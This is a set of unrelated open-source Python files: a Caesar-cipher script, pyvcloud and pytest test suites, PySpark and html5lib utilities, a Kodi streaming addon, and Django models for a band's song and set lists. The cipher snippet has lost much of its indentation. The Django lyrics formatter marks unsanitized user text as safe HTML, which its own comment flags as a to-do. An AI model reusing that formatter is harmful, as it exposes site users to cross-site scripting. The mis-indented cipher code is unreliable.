'm', 'n', 'o', 'p', 'q', 'r',
's', 't', 'u', 'v', 'w', 'x',
'y', 'z']
global messageArray
messageArray = []
    choice = int(raw_input("Enter 1 to encode. 2 to decode.\n>> "))
if choice == 1:
encode()
    elif choice == 2:
        decode()  # decode() is sketched below, after encode()
else:
print "Invalid choice"
main()
def encode():
message = raw_input("Enter a string to encode (letters only):\n>> ")
    cypherShift = int(raw_input("Enter an integer from 1-25 for the shift:\n>> "))
# Verify input
if not message.isalpha():
print "Please enter only letters into your message."
main()
else:
pass
if cypherShift < 1 or cypherShift > 25:
print "Invalid number. Please enter a valid shift value."
main()
else:
pass
    # Break the string into letters and shift each one, wrapping around
    # the 26-letter alphabet with modulo arithmetic
    messageArray = list(message.lower())
    for index, letter in enumerate(messageArray):
        messageArray[index] = alphabet[(alphabet.index(letter) + cypherShift) % 26]
    # Output cyphered text
    message = "".join(messageArray)
    print "Your cyphered message is:"
    print message
main()
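# A minimal decode() sketch to pair with encode() above: decoding a Caesar
# cypher is the inverse shift modulo 26 (input validation is omitted here).
def decode():
    message = raw_input("Enter a string to decode (letters only):\n>> ")
    cypherShift = int(raw_input("Enter the shift used to encode (1-25):\n>> "))
    messageArray = list(message.lower())
    for index, letter in enumerate(messageArray):
        messageArray[index] = alphabet[(alphabet.index(letter) - cypherShift) % 26]
    print "Your decoded message is:"
    print "".join(messageArray)
    main()

if __name__ == '__main__':
    main()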
|
mit
|
jiachenning/odoo
|
addons/account_cancel/__init__.py
|
702
|
1046
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
denismakogon/pyvcloud
|
tests/vca_type_tests.py
|
3
|
2884
|
from nose.tools import with_setup
from testconfig import config
from pyvcloud import vcloudair
from pyvcloud.vcloudair import VCA
class TestVCAType:
def test_0001(self):
"""Identify vCloud Director Standalone"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0002(self):
"""Identify vchs is not vCloud Director Standalone"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0003(self):
"""Identify vca is not vCloud Director Standalone"""
vca = VCA(host='https://vca.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0011(self):
"""Identify vCloud Air vchs"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_VCHS
def test_0012(self):
"""Identify vca is not vCloud Air vchs"""
vca = VCA(host='https://vca.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCHS
def test_0013(self):
"""Identify standalone is not vCloud Air vchs"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCHS
def test_0021(self):
"""Identify vCloud Air vca"""
vca = VCA(host='https://iam.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_VCA
def test_0022(self):
"""Identify vchs is not vCloud Air vca"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCA
def test_0023(self):
"""Identify standalone is not vCloud Air vca"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCA
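# These are nose-style tests (note the testconfig import); a typical run is:
#   $ nosetests tests/vca_type_tests.py
# Empty usernames are passed on purpose: only get_service_type() detection is
# exercised, so no real credentials are needed.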
|
apache-2.0
|
chenc10/Spark-PAF
|
python/pyspark/traceback_utils.py
|
160
|
2679
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import namedtuple
import os
import traceback
CallSite = namedtuple("CallSite", "function file linenum")
def first_spark_call():
"""
Return a CallSite representing the first Spark call in the current call stack.
"""
tb = traceback.extract_stack()
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return CallSite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame - 1]
return CallSite(function=sfun, file=ufile, linenum=uline)
class SCCallSiteSync(object):
"""
Helper for setting the spark context call site.
Example usage:
from pyspark.context import SCCallSiteSync
with SCCallSiteSync(<relevant SparkContext>) as css:
<a Spark call>
"""
_spark_stack_depth = 0
def __init__(self, sc):
call_site = first_spark_call()
if call_site is not None:
self._call_site = "%s at %s:%s" % (
call_site.function, call_site.file, call_site.linenum)
else:
self._call_site = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
if SCCallSiteSync._spark_stack_depth == 0:
self._context._jsc.setCallSite(self._call_site)
SCCallSiteSync._spark_stack_depth += 1
def __exit__(self, type, value, tb):
SCCallSiteSync._spark_stack_depth -= 1
if SCCallSiteSync._spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
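# Usage sketch mirroring the SCCallSiteSync docstring (assumes an active
# SparkContext `sc`):
#   with SCCallSiteSync(sc):
#       sc.parallelize([1, 2, 3]).count()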
|
apache-2.0
|
chrispitzer/toucan-sam
|
toucansam/core/models.py
|
1
|
5910
|
import re
from urlparse import urlparse, parse_qs
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
from django.utils.safestring import mark_safe
from durationfield.db.models.fields.duration import DurationField
class ActiveSongsManager(models.Manager):
def get_query_set(self):
qs = super(ActiveSongsManager, self).get_query_set()
qs = qs.filter(active=True)
return qs
class Song(models.Model):
title = models.CharField(max_length=255, blank=True)
short_title = models.CharField(max_length=30, blank=True)
artist = models.CharField(max_length=255, blank=True)
key = models.CharField(max_length=25, blank=True)
singers = models.CharField(max_length=255, blank=True)
cheat_sheet = models.CharField(max_length=255, blank=True)
lyrics_with_chords = models.TextField(blank=True)
video_link = models.URLField(max_length=255, blank=True)
run_time = DurationField(default=2*60*1000000) # default: two minutes
difficulty = models.IntegerField(default=3,
choices=(
(1, 'Real Easy'),
(2, 'Easy'),
(3, 'Normal'),
(4, 'Hard'),
(5, 'Real Hard'),
),
validators=[
MinValueValidator(1),
MaxValueValidator(5),
])
proposed = models.BooleanField(default=True)
active = models.BooleanField(default=True)
objects = models.Manager()
active_objects = ActiveSongsManager()
def save(self, *args, **kwargs):
if not self.short_title and self.title:
self.short_title = self.title[-30:]
super(Song, self).save(*args, **kwargs)
@property
def milliseconds(self):
return self.run_time.total_seconds() * 1000
@property
def column_width(self):
return reduce(lambda a, b: max(a, len(b)), re.split("[\r\n]+", self.lyrics_with_chords), 0)
@property
def lyrics_formatted(self):
"""
Assumes that lyrics with chords interleaves lines with chords and lines with lyrics
"""
def tokenize(s):
return re.split(r'(\w+)', s)
def chordify(chord, cssclass="chord"):
return '<span class="{}">{}</span>'.format(cssclass, chord)
def lineify(line):
return u"<p>{}</p>".format(line)
output = []
chord_line = None
        chord_regex = re.compile(r"^(\W*[ABCDEFG]b?(m|min|maj)?\d*\W*)+$", flags=re.IGNORECASE)
for line in re.split("[\r\n]+", self.lyrics_with_chords):
line = line.rstrip()
if chord_regex.match(line):
if chord_line:
formatted_line = ""
for chord in tokenize(chord_line):
if re.match("\W", chord):
formatted_line += chord
else:
formatted_line += chordify(chord, cssclass="chord inline")
output.append(lineify(formatted_line))
chord_line = line
continue
if chord_line:
formatted_line = ""
#make sure line is as long as chords
line = line.ljust(len(chord_line))
#replace spaces at the beginning & end of the line with -- but not the middle!
frontspaces, line, endspaces = re.split(r"(\S[\s\S]*\S|\S)", line)
space = ' '
line = [space]*len(frontspaces) + list(line) + [space]*len(endspaces)
chords = tokenize(chord_line)
for chord in chords:
l = len(chord)
if not (chord+" ").isspace():
formatted_line += chordify(chord)
formatted_line += "".join(line[:l])
line = line[l:]
line = formatted_line + "".join(line)
chord_line = None
output.append(lineify(line))
return mark_safe(u"\n".join(output)) # todo: sanitize input
def has_no_lyrics(self):
return len(self.lyrics_with_chords) < 50
def youtube_video_id(self):
try:
parsed = urlparse(self.video_link)
if parsed.netloc.endswith('youtube.com'):
query = parse_qs(parsed.query)
return query.get('v', [None])[0]
        except Exception:
            return None
def __unicode__(self):
return self.title
def get_absolute_url(self):
return reverse('song', args=[self.id])
class Meta:
ordering = ["title"]
class Gig(models.Model):
name = models.CharField(max_length=255)
date = models.DateTimeField(null=True)
def __unicode__(self):
return self.name or "undefined"
class SetItem(models.Model):
song = models.ForeignKey(Song, related_name='setitems')
set_list = models.ForeignKey("SetList", related_name='setitems')
order = models.IntegerField()
class SetList(models.Model):
gig = models.ForeignKey(Gig)
songs = models.ManyToManyField(Song, related_name="set_lists", through=SetItem)
show_proposed = models.BooleanField(default=False)
@property
def name(self):
return self.gig.name
@property
def ordered_songs(self):
return self.songs.order_by('setitems__order')
@property
def run_time(self):
microseconds = int(self.songs.aggregate(s=models.Sum('run_time'))['s'])
return timedelta(microseconds=microseconds)
def __unicode__(self):
return self.name or "undefined"
|
gpl-2.0
|
aldariz/Sick-Beard
|
lib/html5lib/treewalkers/etree.py
|
98
|
4817
|
import gettext
_ = gettext.gettext
try:
from types import ModuleType
except:
from new import module as ModuleType
import copy
import re
import _base
from html5lib.constants import voidElements
tag_regexp = re.compile("{([^}]*)}(.*)")
moduleCache = {}
def getETreeModule(ElementTreeImplementation):
name = "_" + ElementTreeImplementation.__name__+"builder"
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType("_" + ElementTreeImplementation.__name__+"builder")
objs = getETreeBuilder(ElementTreeImplementation)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
def getETreeBuilder(ElementTreeImplementation):
ElementTree = ElementTreeImplementation
class TreeWalker(_base.NonRecursiveTreeWalker):
"""Given the particular ElementTree representation, this implementation,
to avoid using recursion, returns "nodes" as tuples with the following
content:
1. The current element
2. The index of the element relative to its parent
3. A stack of ancestor elements
4. A flag "text", "tail" or None to indicate if the current node is a
text node; either the text or tail of the current element (1)
"""
def getNodeDetails(self, node):
if isinstance(node, tuple): # It might be the root Element
elt, key, parents, flag = node
if flag in ("text", "tail"):
return _base.TEXT, getattr(elt, flag)
else:
node = elt
if not(hasattr(node, "tag")):
node = node.getroot()
if node.tag in ("<DOCUMENT_ROOT>", "<DOCUMENT_FRAGMENT>"):
return (_base.DOCUMENT,)
elif node.tag == "<!DOCTYPE>":
return (_base.DOCTYPE, node.text,
node.get("publicId"), node.get("systemId"))
elif node.tag == ElementTree.Comment:
return _base.COMMENT, node.text
else:
assert type(node.tag) in (str, unicode), type(node.tag)
#This is assumed to be an ordinary element
match = tag_regexp.match(node.tag)
if match:
namespace, tag = match.groups()
else:
namespace = None
tag = node.tag
attrs = {}
for name, value in node.attrib.items():
match = tag_regexp.match(name)
if match:
attrs[(match.group(1),match.group(2))] = value
else:
attrs[(None,name)] = value
return (_base.ELEMENT, namespace, tag,
attrs, len(node) or node.text)
def getFirstChild(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
element, key, parents, flag = node, None, [], None
if flag in ("text", "tail"):
return None
else:
if element.text:
return element, key, parents, "text"
elif len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
def getNextSibling(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
else:
if element.tail and flag != "tail":
return element, key, parents, "tail"
elif key < len(parents[-1]) - 1:
return parents[-1][key+1], key+1, parents, None
else:
return None
def getParentNode(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if not parents:
return element
else:
return element, key, parents, None
else:
parent = parents.pop()
if not parents:
return parent
else:
return parent, list(parents[-1]).index(parent), parents, None
return locals()
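# Usage sketch (assumes the stdlib ElementTree implementation):
#   import xml.etree.ElementTree as ET
#   walker = getETreeModule(ET).TreeWalker(ET.fromstring("<p>hi</p>"))
#   for token in walker:
#       print token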
|
gpl-3.0
|
yangqian/plugin.video.pandatv
|
addon.py
|
1
|
4342
|
# -*- coding: utf-8 -*-
# Module: default
# Author: Yangqian
# Created on: 25.12.2015
# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html
# Largely following the example at
# https://github.com/romanvm/plugin.video.example/blob/master/main.py
import xbmc, xbmcgui, urllib2, re, xbmcplugin
from BeautifulSoup import BeautifulSoup
from urlparse import parse_qsl
import sys
import json
# Get the plugin url in plugin:// notation.
_url=sys.argv[0]
# Get the plugin handle as an integer number.
_handle=int(sys.argv[1])
def list_categories():
f=urllib2.urlopen('http://www.panda.tv/cate')
rr=BeautifulSoup(f.read())
catel=rr.findAll('li',{'class':'category-list-item'})
rrr=[(x.a['class'], x.a['title']) for x in catel]
listing=[]
for classname,text in rrr:
img=rr.find('img',{'alt':text})['src']
list_item=xbmcgui.ListItem(label=text,thumbnailImage=img)
list_item.setProperty('fanart_image',img)
url='{0}?action=listing&category={1}'.format(_url,classname)
is_folder=True
listing.append((url,list_item,is_folder))
xbmcplugin.addDirectoryItems(_handle,listing,len(listing))
#xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
f=urllib2.urlopen('http://www.panda.tv/cate/'+category)
rr=BeautifulSoup(f.read())
videol=rr.findAll('a',{'class':'video-list-item-inner'})
rrr=[(x['href'][1:],x.img,x.findNextSibling('div',{'class':'live-info'})) for x in videol]
listing=[]
for roomid,image,liveinfo in rrr:
img=image['src']
roomname=image['alt']
nickname=liveinfo.find('span',{'class':'nick-name'}).text
peoplenumber=liveinfo.find('span',{'class':'people-number'}).text
combinedname=u'{0}:{1}:{2}'.format(nickname,roomname,peoplenumber)
list_item=xbmcgui.ListItem(label=combinedname,thumbnailImage=img)
list_item.setProperty('fanart_image',img)
url='{0}?action=play&video={1}'.format(_url,roomid)
is_folder=False
listing.append((url,list_item,is_folder))
xbmcplugin.addDirectoryItems(_handle,listing,len(listing))
#xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(roomid):
"""
Play a video by the provided path.
:param path: str
:return: None
"""
f=urllib2.urlopen('http://www.panda.tv/api_room?roomid='+roomid)
r=f.read()
ss=json.loads(r)
hostname=ss['data']['hostinfo']['name']
roomname=ss['data']['roominfo']['name']
#s=re.search('''"room_key":"(.*?)"''',r).group(1)
s=ss['data']['videoinfo']['room_key']
img=ss['data']['hostinfo']['avatar']
combinedname=u'{0}:{1}'.format(hostname,roomname)
# Create a playable item with a path to play.
path='http://pl3.live.panda.tv/live_panda/{0}.flv'.format(s)
play_item = xbmcgui.ListItem(path=path,thumbnailImage=img)
play_item.setInfo(type="Video",infoLabels={"Title":combinedname})
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
# directly play the item.
xbmc.Player().play(path, play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring:
:return:
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
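# Example plugin URLs handled by router() (category/room values hypothetical):
#   plugin://plugin.video.pandatv/?action=listing&category=lol
#   plugin://plugin.video.pandatv/?action=play&video=10000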
|
lgpl-3.0
|
krunal3103/servo
|
tests/wpt/web-platform-tests/tools/pytest/testing/test_skipping.py
|
165
|
26964
|
import pytest
import sys
from _pytest.skipping import MarkEvaluator, folded_skips, pytest_runtest_setup
from _pytest.runner import runtestprotocol
class TestEvaluator:
def test_no_marker(self, testdir):
item = testdir.getitem("def test_func(): pass")
evalskipif = MarkEvaluator(item, 'skipif')
assert not evalskipif
assert not evalskipif.istrue()
def test_marked_no_args(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == ""
assert not ev.get("run", False)
def test_marked_one_arg(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz("hasattr(os, 'sep')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: hasattr(os, 'sep')"
@pytest.mark.skipif('sys.version_info[0] >= 3')
def test_marked_one_arg_unicode(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz(u"hasattr(os, 'sep')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: hasattr(os, 'sep')"
def test_marked_one_arg_with_reason(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz("hasattr(os, 'sep')", attr=2, reason="hello world")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "hello world"
assert ev.get("attr") == 2
def test_marked_one_arg_twice(self, testdir):
lines = [
'''@pytest.mark.skipif("not hasattr(os, 'murks')")''',
'''@pytest.mark.skipif("hasattr(os, 'murks')")'''
]
for i in range(0, 2):
item = testdir.getitem("""
import pytest
%s
%s
def test_func():
pass
""" % (lines[i], lines[(i+1) %2]))
ev = MarkEvaluator(item, 'skipif')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: not hasattr(os, 'murks')"
def test_marked_one_arg_twice2(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif("hasattr(os, 'murks')")
@pytest.mark.skipif("not hasattr(os, 'murks')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'skipif')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: not hasattr(os, 'murks')"
def test_marked_skip_with_not_string(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif(False)
def test_func():
pass
""")
ev = MarkEvaluator(item, 'skipif')
exc = pytest.raises(pytest.fail.Exception, ev.istrue)
assert """Failed: you need to specify reason=STRING when using booleans as conditions.""" in exc.value.msg
def test_skipif_class(self, testdir):
item, = testdir.getitems("""
import pytest
class TestClass:
pytestmark = pytest.mark.skipif("config._hackxyz")
def test_func(self):
pass
""")
item.config._hackxyz = 3
ev = MarkEvaluator(item, 'skipif')
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: config._hackxyz"
class TestXFail:
@pytest.mark.parametrize('strict', [True, False])
def test_xfail_simple(self, testdir, strict):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail(strict=%s)
def test_func():
assert 0
""" % strict)
reports = runtestprotocol(item, log=False)
assert len(reports) == 3
callreport = reports[1]
assert callreport.skipped
assert callreport.wasxfail == ""
def test_xfail_xpassed(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail
def test_func():
assert 1
""")
reports = runtestprotocol(item, log=False)
assert len(reports) == 3
callreport = reports[1]
assert callreport.failed
assert callreport.wasxfail == ""
def test_xfail_run_anyway(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_func():
assert 0
def test_func2():
pytest.xfail("hello")
""")
result = testdir.runpytest("--runxfail")
result.stdout.fnmatch_lines([
"*def test_func():*",
"*assert 0*",
"*1 failed*1 pass*",
])
def test_xfail_evalfalse_but_fails(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail('False')
def test_func():
assert 0
""")
reports = runtestprotocol(item, log=False)
callreport = reports[1]
assert callreport.failed
assert not hasattr(callreport, "wasxfail")
assert 'xfail' in callreport.keywords
def test_xfail_not_report_default(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail
def test_this():
assert 0
""")
testdir.runpytest(p, '-v')
#result.stdout.fnmatch_lines([
# "*HINT*use*-r*"
#])
def test_xfail_not_run_xfail_reporting(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail(run=False, reason="noway")
def test_this():
assert 0
@pytest.mark.xfail("True", run=False)
def test_this_true():
assert 0
@pytest.mark.xfail("False", run=False, reason="huh")
def test_this_false():
assert 1
""")
result = testdir.runpytest(p, '--report=xfailed', )
result.stdout.fnmatch_lines([
"*test_one*test_this*",
"*NOTRUN*noway",
"*test_one*test_this_true*",
"*NOTRUN*condition:*True*",
"*1 passed*",
])
def test_xfail_not_run_no_setup_run(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail(run=False, reason="hello")
def test_this():
assert 0
def setup_module(mod):
raise ValueError(42)
""")
result = testdir.runpytest(p, '--report=xfailed', )
result.stdout.fnmatch_lines([
"*test_one*test_this*",
"*NOTRUN*hello",
"*1 xfailed*",
])
def test_xfail_xpass(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail
def test_that():
assert 1
""")
result = testdir.runpytest(p, '-rX')
result.stdout.fnmatch_lines([
"*XPASS*test_that*",
"*1 xpassed*"
])
assert result.ret == 0
def test_xfail_imperative(self, testdir):
p = testdir.makepyfile("""
import pytest
def test_this():
pytest.xfail("hello")
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
result = testdir.runpytest(p, "-rx")
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*reason:*hello*",
])
result = testdir.runpytest(p, "--runxfail")
result.stdout.fnmatch_lines("*1 pass*")
def test_xfail_imperative_in_setup_function(self, testdir):
p = testdir.makepyfile("""
import pytest
def setup_function(function):
pytest.xfail("hello")
def test_this():
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
result = testdir.runpytest(p, "-rx")
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*reason:*hello*",
])
result = testdir.runpytest(p, "--runxfail")
result.stdout.fnmatch_lines("""
*def test_this*
*1 fail*
""")
def xtest_dynamic_xfail_set_during_setup(self, testdir):
p = testdir.makepyfile("""
import pytest
def setup_function(function):
pytest.mark.xfail(function)
def test_this():
assert 0
def test_that():
assert 1
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*XPASS*test_that*",
])
def test_dynamic_xfail_no_run(self, testdir):
p = testdir.makepyfile("""
import pytest
def pytest_funcarg__arg(request):
request.applymarker(pytest.mark.xfail(run=False))
def test_this(arg):
assert 0
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*NOTRUN*",
])
def test_dynamic_xfail_set_during_funcarg_setup(self, testdir):
p = testdir.makepyfile("""
import pytest
def pytest_funcarg__arg(request):
request.applymarker(pytest.mark.xfail)
def test_this2(arg):
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
@pytest.mark.parametrize('expected, actual, matchline',
[('TypeError', 'TypeError', "*1 xfailed*"),
('(AttributeError, TypeError)', 'TypeError', "*1 xfailed*"),
('TypeError', 'IndexError', "*1 failed*"),
('(AttributeError, TypeError)', 'IndexError', "*1 failed*"),
])
def test_xfail_raises(self, expected, actual, matchline, testdir):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(raises=%s)
def test_raises():
raise %s()
""" % (expected, actual))
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
matchline,
])
def test_strict_sanity(self, testdir):
"""sanity check for xfail(strict=True): a failing test should behave
exactly like a normal xfail.
"""
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature', strict=True)
def test_foo():
assert 0
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
'*XFAIL*',
'*unsupported feature*',
])
assert result.ret == 0
@pytest.mark.parametrize('strict', [True, False])
def test_strict_xfail(self, testdir, strict):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature', strict=%s)
def test_foo():
with open('foo_executed', 'w'): pass # make sure test executes
""" % strict)
result = testdir.runpytest(p, '-rxX')
if strict:
result.stdout.fnmatch_lines([
'*test_foo*',
'*XPASS(strict)*unsupported feature*',
])
else:
result.stdout.fnmatch_lines([
'*test_strict_xfail*',
'XPASS test_strict_xfail.py::test_foo unsupported feature',
])
assert result.ret == (1 if strict else 0)
assert testdir.tmpdir.join('foo_executed').isfile()
@pytest.mark.parametrize('strict', [True, False])
def test_strict_xfail_condition(self, testdir, strict):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(False, reason='unsupported feature', strict=%s)
def test_foo():
pass
""" % strict)
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines('*1 passed*')
assert result.ret == 0
@pytest.mark.parametrize('strict_val', ['true', 'false'])
def test_strict_xfail_default_from_file(self, testdir, strict_val):
testdir.makeini('''
[pytest]
xfail_strict = %s
''' % strict_val)
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature')
def test_foo():
pass
""")
result = testdir.runpytest(p, '-rxX')
strict = strict_val == 'true'
result.stdout.fnmatch_lines('*1 failed*' if strict else '*1 xpassed*')
assert result.ret == (1 if strict else 0)
class TestXFailwithSetupTeardown:
def test_failing_setup_issue9(self, testdir):
testdir.makepyfile("""
import pytest
def setup_function(func):
assert 0
@pytest.mark.xfail
def test_func():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 xfail*",
])
def test_failing_teardown_issue9(self, testdir):
testdir.makepyfile("""
import pytest
def teardown_function(func):
assert 0
@pytest.mark.xfail
def test_func():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 xfail*",
])
class TestSkip:
def test_skip_class(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
class TestSomething(object):
def test_foo(self):
pass
def test_bar(self):
pass
def test_baz():
pass
""")
rec = testdir.inline_run()
rec.assertoutcome(skipped=2, passed=1)
def test_skips_on_false_string(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip('False')
def test_foo():
pass
""")
rec = testdir.inline_run()
rec.assertoutcome(skipped=1)
def test_arg_as_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip('testing stuff')
def test_bar():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*testing stuff*",
"*1 skipped*",
])
def test_skip_no_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
def test_foo():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*unconditional skip*",
"*1 skipped*",
])
def test_skip_with_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip(reason="for lolz")
def test_bar():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*for lolz*",
"*1 skipped*",
])
def test_only_skips_marked_test(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
def test_foo():
pass
@pytest.mark.skip(reason="nothing in particular")
def test_bar():
pass
def test_baz():
assert True
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*nothing in particular*",
"*1 passed*2 skipped*",
])
class TestSkipif:
def test_skipif_conditional(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif("hasattr(os, 'sep')")
def test_func():
pass
""") # noqa
x = pytest.raises(pytest.skip.Exception, lambda:
pytest_runtest_setup(item))
assert x.value.msg == "condition: hasattr(os, 'sep')"
@pytest.mark.parametrize('params', [
'"hasattr(sys, \'platform\')"',
'True, reason="invalid platform"',
])
